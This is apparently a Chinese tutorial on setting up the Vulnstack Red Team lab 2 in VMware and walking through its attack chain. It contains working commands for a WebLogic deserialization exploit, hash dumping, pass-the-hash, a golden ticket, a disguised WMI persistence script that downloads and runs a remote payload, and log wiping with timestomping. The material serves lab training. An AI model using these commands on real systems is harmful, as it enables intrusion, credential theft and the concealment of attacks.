保姆级教程：手把手带你用VMware搭建Vulnstack红日靶场2（附网络配置避坑指南）

从零构建企业级攻防演练环境Vulnstack红日靶场2全流程实战解析在企业安全攻防演练中一个高度仿真的靶场环境往往能大幅提升技术人员的实战能力。Vulnstack红日靶场2作为国内知名的内网渗透训练平台模拟了真实企业网络中的多层级防御体系是安全从业者磨练技能的绝佳沙盒。本文将彻底拆解从环境搭建到完整攻击链构建的全过程特别针对网络配置这一关键环节提供深度避坑指南。1. 靶场环境科学部署方法论1.1 硬件与网络拓扑规划在开始部署前需要明确几个核心原则隔离性靶机网络必须与生产环境物理隔离可复现性所有配置需文档化以便快速重建性能平衡根据主机资源合理分配虚拟机配置推荐的最低硬件配置CPU4核及以上需支持虚拟化内存16GB建议分配Kali 4GBWindows靶机各2-3GB存储SSD剩余空间≥50GB网络拓扑设计要点[物理主机] ←NAT→ [Kali攻击机(192.168.111.128)] ↓ [仅主机模式] ←→ [WEB(192.168.111.80)] ↓ [内网] ←→ [PC(192.168.111.201) ↔ DC(10.10.10.10)]1.2 VMware网络配置精要网络配置是新手最容易出错的环节需要特别注意以下参数配置项WEB端PC端DC端适配器1NAT(192.168.111.0)NAT(192.168.111.0)仅主机(10.10.10.0)适配器2仅主机(10.10.10.0)仅主机(10.10.10.0)-子网掩码255.255.255.0255.255.255.0255.255.255.0默认网关192.168.111.2192.168.111.2-常见问题排查技巧IP冲突检测在物理主机执行arp -a查看IP占用情况连通性测试# 从Kali测试WEB连通性 ping 192.168.111.80 # 从WEB测试DC连通性 ping 10.10.10.10服务端口验证nmap -sV -p 7001 192.168.111.80关键提示当遇到网络不通时按以下顺序检查虚拟机网络适配器绑定是否正确防火墙规则是否放行相关流量系统服务是否正常启动DHCP Client等2. 靶机系统初始化与加固2.1 系统快照管理策略红日靶场采用快照还原机制保证环境一致性操作时需注意恢复快照前关闭所有正在运行的进程首次启动时选择我已移动该虚拟机系统完全启动后再进行后续操作推荐操作流程恢复V1.3快照启动后立即创建名为Base_Clean的新快照所有测试在该快照基础上进行2.2 安全软件配置规范靶机内置360安全卫士用于模拟企业防护环境正确配置方法启动后以Administrator登录密码1qazWSX在360设置中关闭自动更新和云查杀添加以下目录到信任区C:\Oracle\Middleware\ C:\Windows\Temp\3. 漏洞利用链深度解析3.1 Weblogic反序列化漏洞实战攻击流程可分为四个阶段信息收集阶段# 使用nmap进行服务识别 nmap -sV -p 7001 --script weblogic-t3-info 192.168.111.80漏洞验证阶段# 使用WeblogicScan.py进行漏洞检测 python WeblogicScan.py -t 192.168.111.80 -p 7001 -v CVE-2019-2725攻击实施阶段msfconsole use exploit/multi/misc/weblogic_deserialize_asyncresponseservice set rhosts 192.168.111.80 set lhost 192.168.111.128 set target 1 exploit后渗透阶段# 获取系统信息 sysinfo # 转储密码哈希 hashdump3.2 横向移动技术矩阵在获取WEB服务器权限后可通过多种方式向内网渗透技术手段适用场景对应命令/工具Psexec445端口开放psexec.py DOMAIN/user:passIPWMIexec防火墙限制445端口wmiexec.py DOMAIN/user:passIPPass-the-Hash获取NTLM哈希但无明文密码sekurlsa::pth /user:admin /ntlm:xxxx4. 域渗透高阶技巧4.1 黄金票据制作全流程获取KRBTGT哈希mimikatz # lsadump::dcsync /domain:redteam.lab /user:krbtgt提取域SIDwhoami /all # 截取S-1-5-21-2756371121-2868759905-3853650604部分生成黄金票据mimikatz # kerberos::golden /admin:Administrator /domain:redteam.lab /sid:S-1-5-21... /krbtgt:xxxx /ticket:golden.kirbi票据注入与验证kerberos::ptt golden.kirbi dir \\dc.redteam.lab\c$4.2 权限维持技术选型企业环境中常见的持久化方式对比技术隐蔽性稳定性检测难度计划任务★★☆★★★★★☆WMI事件订阅★★★★★★★★☆服务注册★★☆★★★★★☆启动文件夹★☆☆★★★★☆☆注册表Run键★★☆★★★★★☆实战建议组合使用WMI事件订阅服务注册的方式# 创建持久化WMI事件 $filterArgs { EventNamespace root\cimv2 Name WindowsUpdateFilter Query SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA Win32_PerfFormattedData_PerfOS_System QueryLanguage WQL } $filter Set-WmiInstance -Namespace root\subscription -Class __EventFilter -Arguments $filterArgs $consumerArgs { Name WindowsUpdateConsumer CommandLineTemplate cmd.exe /c powershell -nop -w hidden -c \IEX (New-Object Net.WebClient).DownloadString(http://192.168.111.128/rev.ps1)\ } $consumer Set-WmiInstance -Namespace root\subscription -Class CommandLineEventConsumer -Arguments $consumerArgs Set-WmiInstance -Namespace root\subscription -Class __FilterToConsumerBinding -Arguments { Filter $filter Consumer $consumer }5. 防御视角的渗透痕迹分析5.1 日志审计关键点攻击者常见操作在Windows日志中的对应事件ID攻击行为安全日志事件ID系统日志事件ID远程代码执行46887045服务创建46977045计划任务创建4698106账号登录4624-特权提升4672-5.2 痕迹清理实战方案针对不同日志类型的清理方法安全日志清理wevtutil cl Security系统日志清理# 使用Phantom工具包 Import-Module .\Invoke-Phant0m.ps1 Invoke-Phant0m -ProcessId [LSASS_PID]文件操作痕迹清理# 使用Timestomp工具修改文件时间属性 timestomp target.txt -m 01/01/2020 12:00:00在实际攻防演练中建议保留部分可控痕迹以模拟真实攻击场景同时记录所有操作步骤用于事后复盘分析。